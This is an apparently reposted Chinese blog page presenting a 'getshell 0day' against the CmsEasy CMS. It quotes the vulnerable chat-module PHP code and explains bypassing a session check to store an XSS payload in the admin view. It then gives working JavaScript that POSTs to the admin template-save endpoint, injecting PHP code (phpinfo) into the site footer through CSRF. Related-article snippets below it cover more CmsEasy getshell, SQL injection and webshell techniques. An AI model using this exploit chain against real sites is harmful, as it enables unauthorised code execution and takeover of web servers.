php中提取%3cdiv,cmseasy getshell 0day

最新推荐文章于 2021-05-05 21:58:45 发布
最新推荐文章于 2021-05-05 21:58:45 发布
阅读量234 收藏
点赞数
文章标签: php中提取%3cdiv

by zvall

代码如下:

celive/index.php 代码:

[php]

$_SESSION['thislive'] = md5(time());

$_SESSION['thislivetmp'] = $_SESSION['thislive'];

if ($config['customer_info']) {

header('Location: '.$config['url'].'/live/?action=0&module=celive&thislive='.$_SESSION['thislive'].'&departmentid='.addslashes($_GET['departmentid']));

} else {

header('Location: '.$config['url'].'/live/?action=1&module=celive&thislive='.$_SESSION['thislive'].'&departmentid='.addslashes($_GET['departmentid']));

}

[/php]

通过 302 header 到\celive\live\index.php这个地址,而且 $thislive='.$_SESSION['thislive'] 每次访问的值都会不一样.

\celive\live\index.php 代码:

[php]

if(isset($_GET['departmentid'])){

$departmentid=addslashes($_GET['departmentid']);

}else{

$sql = "SELECT `departmentid` FROM `".$config['prefix']."assigns` WHERE 1";

@$result = $GLOBALS['db']->my_fetch_array($sql);

$tatolr=count($result)-1;

$randomr=rand(0,$tatolr);

$departmentid = $result[$randomr]['departmentid'];

}

$timestamp=time();

$name=addslashes($_POST['name']);

$email=addslashes($_POST['email']);

$phone=addslashes($_POST['phone']);

$name=(!empty($name)) ? $name : 'Guest';

$email=(!empty($email)) ? $email : '-';

$phone=(!empty($phone)) ? $phone : '0';

$ip=$_SERVER["REMOTE_ADDR"];

$ip=iconv('gb2312',$GLOBALS['lang']['charset'],$ip);

if(empty($departmentid)) $departmentid=0;

if($_SESSION['thislivetmp']==$_GET['thislive']){

$db->query("INSERT INTO `sessions` (`id` ,`name` ,`email` ,`phone` ,`departmentid` ,`timestamp` ,`ip` ,`status` ) VALUES (NULL , '".$name."', '".$email."', '".$phone."', '".$departmentid."', '".$timestamp."', '".$ip."', '0');");

$sessionid = mysql_insert_id();

$_SESSION['departmentid'] = $departmentid;

$_SESSION['sessionid'] = $sessionid;

$_SESSION['timestamp'] = $timestamp;

$_SESSION['name'] = $name;

}[/php]

$name=addslashes($_POST['name']);这里可以xss 但是他是302 head过来的 。

if($_SESSION['thislivetmp']==$_GET['thislive']) 要绕过这个判断, \celive\live\index.php 只能访问一次,以保证header过去的GET变量

和session[thislivetmp] 一样 :) and =) produces

java 编程 得到302地址和cookie 构造 post name 为js地址 再 post 到302地址上 ,管理员在查看后台时 ,js触发通过ajax 请求 编辑后台模块插入一句话

666.jpg

csrf插入到模版中的php代码

ccc.jpg

bbb.jpg

js代码:[php]function sendrequest(){

var m=["Msxml2.XMLHTTP", "Microsoft.XMLHTTP"]

if (window.ActiveXObject){

for (var i=0; i

try{

return new ActiveXObject(m[i])

}

catch(e){}

}

}else if (window.XMLHttpRequest) {

return new XMLHttpRequest()

}else{

return false

}

}

var request=new sendrequest();

var data= "sid=footer_html&slen=2661&scontent=%3C!--+%E9%A1%B5%E5%BA%95+--%3E%0A%3Cdiv+id%3D%22footer%22+class%3D%22mt10%22%3E%0A%3Cdiv+class%3D%22box%22%3E%0A%3Cdiv+class%3D%22footer%22%3E%0A%3C!--+%E5%8F%8B%E6%83%85logo+--%3E%0A%3Cdiv+class%3D%22links%22%3E%0A%7Bif+%24topid%3D%3D0%7D%0A%7Bloop+friendlink('image'%2C0%2C20)+%24flink%7D%0A%3Ca+href%3D%22%7B%24flink%5Burl%5D%7D%22+title%3D%22%7B%24flink%5Bname%5D%7D%22%3E%3Cimg+src%3D%22%7B%24flink%5Blogo%5D%7D%22+%2F%3E%3C%2Fa%3E%0A%7B%2Floop%7D%0A%7Belse%7D%0A%7Blang(hotkeys)%7D%EF%BC%9A+%7Bgethotsearch(10)%7D%0A%7B%2Fif%7D%0A%3C%2Fdiv%3E%0A%3C!--+%E9%A1%B5%E5%BA%95%E5%AF%BC%E8%88%AA+--%3E%0A%3Cdiv+class%3D%22about%22%3E%0A%3Cimg+src%3D%22%7B%24skin_path%7D%2Fimages%2Ffoot_logo.gif%22+%2F%3E%0A%7Btag_%E7%BD%91%E7%AB%99%E9%A1%B5%E5%BA%95%E5%85%B3%E4%BA%8E%E6%88%91%E4%BB%AC%E7%AD%89%E8%AF%B4%E6%98%8E%7D%0A%7Bif+get('opguestadd')%3D%3D'1'%7D%3Ca+rel%3D%22nofollow%22+href%3D%22%7B%24base_url%7D%2F%3Fg%3D1%22%3E%7Blang(opguestadd)%7D%3C%2Fa%3E+%7C%7B%2Fif%7D%0A%3Ca+href%3D%22%23%22%3ETOP%3C%2Fa%3E%0A%3C%2Fdiv%3E%0A%0A%3Cdiv+class%3D%22copyright%22%3E%0A%0A%3C!--+%E9%A1%B5%E5%BA%95%E8%AF%B4%E6%98%8E+--%3E%0A%7Bget(site_right)%7D+%3Ca+title%3D%22%7Bget('sitename')%7D%22+href%3D%22%7B%24base_url%7D%2F%22%3E%7Bget('sitename')%7D%3C%2Fa%3E+All+Rights+Reserved.%C2%A0%C2%A0+%7Bif+get('site_login')%3D%3D'1'%7D%7Blogin_js()%7D%7B%2Fif%7D%0A%3Cdiv+class%3D%22blank5%22%3E%3C%2Fdiv%3E%0A%7Bgetcnzzcount()%7D%C2%A0%C2%A0Powered+by+%3Ca+href%3D%22http%3A%2F%2Fwww.cmseasy.cn%22+title%3D%22CmsEasy%E4%BC%81%E4%B8%9A%E7%BD%91%E7%AB%99%E7%B3%BB%E7%BB%9F%22+target%3D%22_blank%22%3ECmsEasy%3C%2Fa%3E%C2%A0%C2%A0%3Ca+rel%3D%22nofollow%22+href%3D%22http%3A%2F%2Fwww.miibeian.gov.cn%2F%22+rel%3D%22nofollow%22+target%3D%22_blank%22%3E%7Bget('site_icp')%7D%3C%2Fa%3E%0A%3C%2Fdiv%3E%0A%3Cdiv+class%3D%22clear%22%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%7Bif+%24topid%3D%3D0%7D%3C!--+%E7%83%AD%E9%97%A8%E5%85%B3%E9%94%AE%E8%AF%8D+--%3E%0A%3Cdiv+class%3D%22hot_keys%22%3E%0A%3Cstrong%3E%7Blang(hotkeys)%7D%EF%BC%9A%3C%2Fstrong%3E+%7Bgethotsearch(10)%7D%0A%3Cdiv+class%3D%22blank10%22%3E%3C%2Fdiv%3E%0A%3C!--+%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5+--%3E%0A%0A%3Cstrong%3E%7Blang('links')%7D%EF%BC%9A%3C%2Fstrong%3E%0A%7Bloop+friendlink('text'%2C0%2C20)+%24flink%7D%0A%3Ca+href%3D%22%7B%24flink%5Burl%5D%7D%22+target%3D%22_blank%22%3E%7B%24flink%5Bname%5D%7D%3C%2Fa%3E%0A%7B%2Floop%7D%0A%0A%3C%2Fdiv%3E%7B%2Fif%7D%0A%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22%7B%24base_url%7D%2Fjs%2Fcommon.js%22%3E%3C%2Fscript%3E%0A%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E+%0A%2F%2F+%E5%85%AC%E5%91%8A%E6%BB%9A%E5%8A%A8js%0Avar+t%3DsetInterval(myfunc%2C1000)%3B+%0Avar+oBox%3Ddocument.getElementById(%22announ%22)%3B+%0Afunction+myfunc()%7B+%0Avar+o%3DoBox.firstChild+%0AoBox.removeChild(o)+%0AoBox.appendChild(o)+%0A%7D+%0AoBox.onmouseover%3Dfunction()%0A%7B%0AclearInterval(t)%0A%7D+%0AoBox.onmouseout%3Dfunction()%0A%7B%0At%3DsetInterval(myfunc%2C2000)%2F%2F%E6%BB%9A%E5%8A%A8%E6%97%B6%E9%97%B4%EF%BC%8C%E9%BB%98%E8%AE%A42%E7%A7%92%0A%7D+%0A%3C%2Fscript%3E%0A%0A%3C!--+%E5%9C%A8%E7%BA%BF%E5%AE%A2%E6%9C%8D+--%3E%0A%7Btemplate+'system%2Fservers.html'%7D%0A%3C!--+%E7%9F%AD%E4%BF%A1+--%3E%0A%7Btemplate+'system%2Fsms.html'%7D%0A%0A%0A%7Bif+get('share')%3D%3D'1'%7D%0A%3C!--+Baidu+Button+BEGIN+--%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+id%3D%22bdshare_js%22+data%3D%22type%3Dslide%26img%3D6%26pos%3Dright%26uid%3D620555%22+%3E%3C%2Fscript%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+id%3D%22bdshell_js%22%3E%3C%2Fscript%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0A%09%09var+bds_config+%3D+%7B%22bdTop%22%3A150%7D%3B%0A%09%09document.getElementById(%22bdshell_js%22).src+%3D+%22http%3A%2F%2Fbdimg.share.baidu.com%2Fstatic%2Fjs%2Fshell_v2.js%3Ft%3D%22+%2B+new+Date().getHours()%3B%0A%3C%2Fscript%3E%0A%3C!--+Baidu+Button+END+--%3E%0A%7B%2Fif%7D%0A%0A%0A%3Cscript%3E%0Afunction+checkmail(str)%0A%7B%0Avar+strreg%3D%22email%22%3B%0Avar+r%3B%0Avar+strtext%3Ddocument.all(str).value%3B%0A%2F%2Fstrreg%3D%2F%5Ew%2B((-w%2B)%7C(.w%2B))*%40%5Ba-za-z0-9%5D%2B((.%7C-)%5Ba-za-z0-9%5D%2B)*.%5Ba-za-z0-9%5D%2B%24%2Fi%3B%0Astrreg%3D%2F%5Ew%2B((-w%2B)%7C(.w%2B))*%40%7B1%7Dw%2B.%7B1%7Dw%7B2%2C4%7D(.%7B0%2C1%7Dw%7B2%7D)%7B0%2C1%7D%2Fig%3B%0Ar%3Dstrtext.search(strreg)%3B%0Aif(r%3D%3D-1)+%7B%0Aalert(%22%E9%82%AE%E7%AE%B1%E6%A0%BC%E5%BC%8F%E9%94%99%E8%AF%AF!%22)%3B%0Adocument.all(str).focus()%3B%0A%7D%0A%7D%0A%3C%2Fscript%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A%3C%3Fphp+phpinfo()%3B%3F%3E%EF%BC%9B";

request.open("POST", "/cmseasy/index.php?case=template&act=save&admin_dir=admin&site=default", true);

request.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=UTF-8");

request.send(data)[/php]

严成旺
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CMSeasy v5.5任意权限getshell
08-28
CMSeasy任意权限getshell
cmseasy最新版任意权限getshell
HandsomeOhJie的博客
07-02 1304
http://www.2cto.com/Article/201409/334131.html
php 去掉%3c p%3e,cmseasy csrf通过一个xss最后getshell
weixin_39609423的博客
03-28 2324
为什么我们要选择get类型的呢,因为get类型存储到数据库的时候触发时候管理员是察觉不到的,可以通过图片等进行操作,然后我们存储一个xss后门,这样一来,我们就可以加载一个远端的js,那么就各种无视token和referer了开始我们先分析一段源代码:celive/admin/system.php:(line:128-142):if($do == 'add' and $username != ''...
php ceil 漏洞,【技术分享】CmsEasy前台无限制GetShell
weixin_39786706的博客
04-07 463
简要描述CMSEasy官方在2016-10-12发布了一个补丁,描述只有两句话前台getshell漏洞修正;命令执行漏洞修正;我们就根据补丁来分析一下这个前台Getshell漏洞。漏洞详情修改的文件不多,通过diff发现补丁lib/default/tool_act.php 392行的cut_image_action()函数被注释了。来看看这个函数/*functioncut_image_acti...
php strlen漏洞,CmsEasy前台无限制GetShell
weixin_42196750的博客
03-27 2884
来源:阿里先知(安全情报)简要描述CMSEasy官方在2016-10-12发布了一个补丁,描述只有两句话前台getshell漏洞修正;命令执行漏洞修正;我们就根据补丁来分析一下这个前台Getshell漏洞。漏洞详情修改的文件不多,通过diff发现补丁lib/default/tool_act.php 392行的cut_image_action()函数被注释了。来看看这个函数/*function c...
CmsEasy20160825前台无限制GetShell复现
weixin_34010949的博客
12-07 668
GetShell思路:根据里面漏洞代码直接取post数据后缀作为后缀这一特性,且CMS支持FTP。        利用FTP上传图片,通过下载上传的正常图片(已被PHP的GD库渲染)之后,        利用脚本在图片插入payload,        再次利用FTP上传达到GET Shell的目的。 索马里师傅的post数据如下: POST /index.php?case=too...
绕过安全狗Getshell
06-12
详细手把手教你如何绕过安全狗Getshell,新手一学就会
记一次另类的getshell
Bul1et的博客
11-08 2058
我们都知道getshell的意思就是上传一句话然后使用菜刀连接一句话在对方服务器的绝对路径,然后获得服务器的各个盘符的信息 这次我把一句话上传成功了   并且访问一句话服务器也解析了   但是菜刀就是不能连接  查看了网上的资料发现了一种另类的姿势 http://xxx/static/7777.php 访问我们的一句话7777.php页面返回空白  所以判断我们的一句话被解析了 菜刀连得...
记某CMS漏洞getshell
zhangge3663的博客
05-05 2817
记极致CMS漏洞getshell 今天下午比较空闲,就去搜索一些cms,突然对极致CMS感兴趣,而网上已经有一些文章对它进行分析利用,sql注入,xss,后台修改上传后缀名前台getshell等等。 于是就引起了我的兴趣想去测试一下。 信息收集 还是因为自己太懒,不想搭建环境,然后就想网上有好多网站啊,随便找一个去看看。hhh然后去利用fofa去搜索。(不能随便乱日) 弱密码yyds 搜索了一些网站,我们直接在url后面添加/admin.php,就直接跳到后台登录的地方。 看到后台?!嗯
任意文件上传getshell
Websec
03-21 8820
漏洞描述:任意文件上传顾名思义就是在文件上传的地方能够上传任意类型的文件,我们可以上传恶意木马文件对其服务器进行攻击。漏洞寻找:通过查看文件上传的地方,通过burpsuite抓包分析其上传点对其文件类型是否做了限制,也可能只是做了前端限制,但是这个都不要紧,直接绕过就行漏洞修复建议:1.文件上传的地方,我们需要对其文件格式做白名单限制,只允许我们需要的文件进行上传即可2.对文件格式进行校验,前端以...
利用MSSQL getshell
热门推荐
浅笑996的博客
11-17 1万+
此次复现使用的sql server 2000 和sql server 2008两个环境进行的 是在已知数据库密码的基础上进行的 0x01 MSSQL连接 连接MSSQL 2000 新建连接: 填写目的IP、目的端口、用户名、密码: 一直下一步,完成后,数据库导航窗口会出现一个连接,双击连接: 若是第一次连接,双击会提示下载驱动文件,若不成功,需多次反复尝试 新建SQL编辑器即可执行SQL语...
网站后台getshell的方法总结
L_lemo004的博客
07-12 5976
方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell。 坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用…/跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名 方法二:数据库备份getshell 以南方数据cms为例: 1,首先上传一张图片马...
xycms后台shell
shisongsong的博客
11-25 4011
进入后台修改  网站名称     xxx网站"%> 修改成功后,菜刀连接 http://www.xxx.com /inc/config.asp
nginx index.php live,利用nginx的nginx-rtmp-module搭建流媒体直播服务器
weixin_29258865的博客
03-16 362
Nginx除了做web服务器之外在流媒体方面的支持也是有对应的模块,nginx-rtmp-module就是nginx的一个扩展模块,支持rtmp视频推流,同时利用nginx作为web服务器的有时可以很方便的实现直播拉流,项目官方地址是https://github.com/arut/nginx-rtmp-module。下面简述一下安装过程。首先需要下载或者克隆代码#下载wget https://gi...
nginx index.php live,使用nginx搭建点播和直播流媒体服务器的方法步骤
weixin_33196646的博客
03-16 517
环境 centos7 nginx1 安装nginx依赖包 yum install gcc gcc-c++ openssl-devel zlib-devel pcre pcre-devel yamdi2.下载解压nginx_mod_h264_streaming,让nginx支持flv,mp4流播放 wget http://h264.code-shop.com/download/nginx_m...
easycms php7.1,cmseasy sql注入漏洞(无视防御)
weixin_35029527的博客
03-29 1027
cmseasy某处sql注入,无视防御从/celive/live/index.php开始:include('../include/config.inc.php');include_once(CE_ROOT . '/include/celive.class.php');$ac = addslashes($_GET['action']);if ($ac == '1') {$live = new cel...
php 局域网视频服务,直播服务(本地局域网)
weixin_39597636的博客
03-13 547
直播服务(本地局域网)建立直播服务(局域网)1.安装Nginx (直播所需的nginx-rtmp-module)2.安装MySQL (可选)3.安装PHP4.安装视频推流相关工具(x264、ffmpeg、fdk-aac)首先建立一个目录存文件如 src mkdir src切换进目录 cd src下载nginx-rtmp-module模块 这里使用git工具git clone https://...
CMSEasySQL注入漏洞
此去清风白日,自由道风景好
09-03 1459
申明:分析分析,这个洞也不是我挖掘的。
cmseasy(易通CMS) 注入漏洞 上传漏洞 爆路径ODAY(含修复)
收集盒 Book box
01-03 2682
注入漏洞 注入点:/celive/js/include.php?cmseasylive=1111&departmentid=0 类型: mysql blind—string 错误关键字:online.gif 表名:cmseasy_user 列明:userid,username,password 直接放Havij里面跑。错误关键字:online.gif 添加表名:cmseasy_user
在msp430f6638如何利用INA21X完成每10毫秒进行一次电流值监测,请给出代码
最新发布
05-31
I2CDIV = 0x0A; // 设置 I2C 时钟分频器 P3SEL |= BIT0 + BIT1; // 配置 P3.0 和 P3.1 为 I2C 引脚 } void i2c_write(uint8_t addr, uint8_t reg, uint8_t data) { while(I2CCTL & STP); // 等待总线空闲 I2...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值